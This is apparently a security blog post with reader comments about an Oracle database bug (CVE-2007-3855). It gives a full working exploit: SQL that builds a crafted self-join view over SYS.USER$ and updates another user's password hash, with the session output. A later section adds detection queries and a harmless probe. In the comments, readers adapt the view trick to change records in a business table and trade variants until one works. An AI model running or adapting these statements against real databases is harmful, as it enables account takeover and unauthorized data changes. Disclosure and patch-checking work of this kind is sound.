Exploit for Create View Problem published

Andrea Purificato has published an exploit for the Create-View-Problem (DB17, aka CVE-2007-3855, a bug found by Red-Database-Security). The issue was fixed with the July 2007 Critical Patch Update (CPU).

The exploit updates the password hash in SYS.USER$ through a specially crafted view: a self-join view over a table on which the user only holds SELECT, which the affected versions wrongly allow to be updated. On its own, however, Andrea's exploit does not work. Changing a password hash with a direct UPDATE on SYS.USER$ is not a supported operation, and the new hash is not used for logons until an additional step is taken, as the following example shows.

Example:
– We calculate the password hashes for the user RDS with the passwords RDS and HACKED using the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Now we connect to the database as a user that holds CREATE VIEW and SELECT on SYS.USER$ (here CPU) and update the password hash via the specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password='7B843A192FF96BE9' where name='RDS';

1 row updated.

SQL> commit;

Commit complete.

– The password is now changed to HACKED.

SQL> select password from sys.user$ where name='RDS';

PASSWORD
——————————
7B843A192FF96BE9

– But the connect attempt with the new password throws an error message...
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– The old hash is still held in the dictionary cache, so to activate the password change it is necessary to restart the database. After the restart the logon with the new password succeeds.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>
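For a DBA who wants to check an instance for this issue rather than exploit it, the following SQL is an added example and not part of the original post or of Andrea's exploit. It assumes the standard Oracle data dictionary (DBA_DEPENDENCIES, DUAL) and a low-privileged test account holding only CREATE SESSION and CREATE VIEW; the view name PROBE_DUAL is illustrative.

```sql
-- Added example (not from the original post or the published exploit).
-- Part 1: run as a DBA. Which views owned by non-SYS schemas read SYS base
-- tables directly? A view like CPU.BUNKERVIEW over SYS.USER$ shows up here
-- and is worth a closer look, since a user-owned join view over SYS.USER$
-- has no legitimate purpose.
select d.owner, d.name, d.referenced_owner, d.referenced_name
  from dba_dependencies d
 where d.type = 'VIEW'
   and d.owner not in ('SYS', 'SYSTEM')
   and d.referenced_owner = 'SYS'
   and d.referenced_type = 'TABLE'
 order by d.owner, d.name;

-- Part 2: run as the low-privileged test account (CREATE SESSION, CREATE VIEW
-- only; SELECT on DUAL is granted to PUBLIC). A harmless probe: the same
-- self-join shape as BUNKERVIEW, but over DUAL instead of SYS.USER$.
-- Unpatched: the DELETE reports "1 row deleted". Patched: ORA-01031.
-- The transaction is rolled back either way, so DUAL is left untouched,
-- and the probe view is dropped afterwards.
create or replace view probe_dual as
select x.dummy
  from sys.dual x
  left outer join sys.dual y on x.dummy = y.dummy;

delete from probe_dual;

rollback;

drop view probe_dual;
```

The shape of the crafted view matters: the comments below report that on 9.2.0.8 the LEFT JOIN variant did not reproduce the problem while a subquery (`... WHERE ID IN ...`) variant did, so a negative probe with one shape does not by itself prove the instance is patched; check the installed CPU level as well.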

5 responses to "Exploit for Create View Problem published"

  1. Andre van Winssen says:

    Alex,
    I tried the bunkerview on a 10203 database which had patch 7 (6038241) applied, which is also labeled as CPU April 2007, and it failed. So it looks like it was already fixed before CPU July 2007 came out. I have the feeling that Oracle releases security fixes in between CPUs as well.

    Below is the patch history on the Windows 32 bit platform for 10.2.0.3 since CPU April 2007:

    6116131 PATCH 8 WINDOWS 32 BIT 10.2.0.3 17-JUL-2007 (First Cpu July 2007)
    6038241 PATCH 7 WINDOWS 32 BIT 10.2.0.3 05-JUL-2007
    6012742 PATCH 6 WINDOWS 32 BIT 10.2.0.3 07-JUN-2007
    5946186 PATCH 5 WINDOWS 32 BIT 10.2.0.3 19-MAY-2007
    5948242 PATCH 4 WINDOWS 32 BIT 10.2.0.3 17-APR-2007 (First Cpu April 2007)

    SQL> show user
    USER is "HEK"
    SQL> select * from user_sys_privs;

    USERNAME PRIVILEGE ADM
    —————————— —————————————- —
    HEK CREATE SESSION NO
    HEK CREATE VIEW NO

    SQL> get bunkerview2
    1 create or replace view bunkerview as
    2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
    3* x.name=y.name
    SQL> /
    select x.name,x.password from sys.user$ x left outer join sys.user$ y on
    *
    ERROR at line 2:
    ORA-00942: table or view does not exist

  2. bunker says:

    You need the “select” privilege on sys.user$.

    Otherwise you can try to create a similar view on another table where you can select, and do an update, insert or delete on it!

    Bye,

    bunker

  3. seydon says:

    Hi.

    Tried this.
    It doesn't work.

    USER'S PRIVILEGES:
    CREATE SESSION
    CREATE VIEW.

    I have the right to select on the table Contragent.
    I wrote this script:
    create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id;
    update test_hack_view set insiderid='1' where id='12345';

    GO/

    and receive the error:
    ORA-01031: insufficient privileges.

    What rights must I have for this exploit?

  4. Alexander Kornbrust says:

    Seydon,

    I don't see the problem. You need only SELECT and CREATE VIEW privileges.
    What database version do you have? You could try the following view instead:

    create or replace hackcontra as

    This was one of our testcases:
    —————————
    create view hackdual as
    select * from dual;

    delete from hackdual;

    rollback;

  5. seydon says:

    Thanks.
    It works!!!
    With "left join" it doesn't work.
    With "...WHERE ID IN..." it works perfectly.
    Version: 9.2.0.8.
